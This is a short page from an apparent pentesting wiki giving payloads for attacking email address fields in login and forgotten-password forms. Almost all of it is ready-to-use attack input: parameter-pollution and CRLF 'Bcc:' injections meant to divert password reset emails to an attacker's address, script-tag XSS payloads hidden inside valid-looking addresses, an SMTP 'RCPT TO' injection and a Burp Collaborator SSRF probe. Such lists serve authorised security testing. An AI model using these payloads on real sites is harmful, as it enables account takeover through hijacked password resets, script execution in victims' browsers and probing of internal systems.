Pentest List Wiki

Email Address Forms

How to exploit login and forgotten password forms.

Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form

Param Manipulation and CRLF Injection

Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:

[email protected]&[email protected]
[email protected]%[email protected]
[email protected];[email protected]
[email protected], [email protected]
{”email”:”[email protected]”,”[email protected]”}
{”email”:[”[email protected]”,”[email protected]”]}
[email protected]%0D%0ABcc:[email protected]
[email protected]%0ABcc:[email protected]
[email protected]%0DBcc:[email protected]
[email protected]\r\nBcc:[email protected]
[email protected]\nBcc:[email protected]
[email protected]\rBcc:[email protected]

Other checks (XSS, SSRF, SMTP Manipulation)

Use these payloads (which are all valid email addresses according to the RFC) to find other issues.

<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"[email protected]\r\nRCPT TO:<victim+"@test.com>
[email protected]
test@[burpcollab.com]

PreviousAuthentication NextAWS Cognito

Last updated 1 year ago